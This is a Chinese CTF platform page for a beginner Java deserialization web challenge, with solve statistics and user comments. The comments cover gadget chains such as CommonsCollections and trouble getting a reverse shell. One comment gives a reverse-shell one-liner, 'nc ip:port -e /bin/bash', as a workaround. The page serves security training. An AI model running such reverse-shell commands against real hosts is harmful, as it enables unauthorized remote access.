ez_java_serializeWEB 未解决
分数:
25
金币:
3
题目作者:
0xcccc
一 血:
Paradiso
一血奖励:
5金币
解 决:
148
提 示:
描 述:
基础的java反序列化题目
其 他:
下载
评分(3)
解题动态
hackerbugku 攻破了该题 12天前
是大方子 攻破了该题 16天前
JJJleo 攻破了该题 18天前
0x2d3CN 攻破了该题 1月前
Mikozhu 攻破了该题 1月前
Flycan 攻破了该题 2月前
huarui 攻破了该题 2月前
tingsi464 攻破了该题 2月前
tfios 攻破了该题 3月前
mcctf 攻破了该题 3月前
15999935435 攻破了该题 3月前
minshenyao 攻破了该题 3月前
moonquakekeke 攻破了该题 4月前
monksky 攻破了该题 4月前
bbgigl 攻破了该题 4月前
李师傅 攻破了该题 4月前
lidd 攻破了该题 5月前
CTFKnight 攻破了该题 5月前
mingmingsong 攻破了该题 5月前
评论
fallingskies 3年前
举报
本地可以,场景里不行,吐了?
Otaku 3年前
举报
...不知道是不是真的连不上外网,反正我在我自己的本地跑不论是ping,curl还是nc都能连上我的vps。但是在这个环境下返回233但是vps毫无反应
amajane 3年前
举报
环境很容易被干死
云牧青 3年前
举报
淦,好坑,bug很多。如果能执行命令了,bash -i反弹是不行的,bash -c中的命令也不能被执行,直接用nc ip:port -e /bin/bash
hotencode 3年前
举报
到了2333这一步请问师傅怎么nc的啊,我根本连不上
Black_hole 3年前
举报
rnm退钱
bazett 3年前
举报
没明白反序列化是啥意思
云牧青 3年前
举报
搞了一下午,从最开始啥也不知道干到ObjectInputStream,干到CommonsCollections,干到成功看到2333的响应。启动了两次环境,结果发现好像不通外网拿不了shell... 你却让我输得这么彻底,哈哈哈哈哈哈哈, 焯 !!!!!!
狐萝卜CarroT 3年前
举报
java反序列化我倒是没了解过,还是先去看看基础吧..
zxmals 3年前
举报
还要花金币下载 。。。。。
lengf 3年前
举报
给一点点提示也行呀(っ °Д °;)っ
lengf 2年前
举报
@0xcccc 好哒
pork 3年前
举报
@0xcccc 靶机好像连不了外网,无法反弹shell,不知道还有没有其他方法?
0xcccc 3年前
举报
不是提供源码了吗,你可先去了解一下java反序列化漏洞